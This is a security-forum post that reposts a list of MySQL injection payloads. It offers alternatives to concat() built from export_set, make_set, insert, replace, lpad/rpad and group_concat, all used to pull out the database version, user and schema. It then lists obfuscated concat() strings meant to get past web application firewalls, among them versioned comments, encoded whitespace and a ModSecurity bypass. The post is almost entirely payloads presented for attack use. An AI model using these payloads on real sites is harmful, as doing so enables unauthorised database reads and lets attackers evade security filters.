Jump to content
Nytro

MySQL Injection concat() replacements

By Nytro, in Securitate web

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted 

mysql injection concat() replacements @sergey_lakantar 
select export_set(1,version(),user(),' : ',2);
5.1.7 : my_user

select export_set(1,version(),export_set(1,user(),schema(),' : ',2),' : ',2);
5.1.7 : my_user : my_db

select make_set(7,version(),user(),schema());
5.1.7,my_user,my_db

select replace(make_set(7,version(),user(),schema()),',',' : ');
5.1.7 : my_user : my_db

select insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : ');
5.1.7 : my_user

select insert(insert(schema(),length(schema())--1,0,insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : ')),length(schema())--1,0,' : ');
5.1.7 : my_user : my_db

select replace(replace(replace('!?$','!',version()),'?',' : '),'$',user());
5.1.7 : my_user

select replace(replace(replace(replace('!?$?^','!',version()),'?',' : '),'$',user()),'^',schema());
5.1.7 : my_user : my_db

select lpad(lpad(user(),@x:=length(user())--3,' : '),@x--length(version()),version())
5.1.7 : my_user

select lpad(lpad(lpad(lpad(schema(),@x:=length(schema())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(version()),version());
5.1.7 : my_user : my_db

select rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user());
5.1.7 : my_user

select rpad(rpad(rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(schema()),schema());
5.1.7 : my_user : my_db

group_concat() without comma-
select (select group_concat(a separator ' : ') from (select version()a union select user() union select schema())x);
5.1.7 : my_user : my_db

concat() waf bypass-
/*!50000group_coNcat(*/)
/*!50000coNcat(*/)
`coNcat`%0a%0b%0c%0d%a0()
{snoopdogg concat()}
{s {n {o {o {p {d {o {g {g`coNcat`()}}}}}}}}}
{s {n {o {o {p {d {o {g {g`coNcat`/*!50000(*/)}}}}}}}}}
{s {n {o {o {p {d {o {g {g`coNcat`/*!50000 /*! /*!40000 /*! /*!(*/((((1 %23aaa%0a )))))}}}}}}}}}
concat-- a%0a()
concat%23aaaaaaaaaa..........%0a(%23aaaaaaa.........%0a)
concat/**x**/()

Modsecurity-
concat+()

Link: concat() replacements - Pastebin.com

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...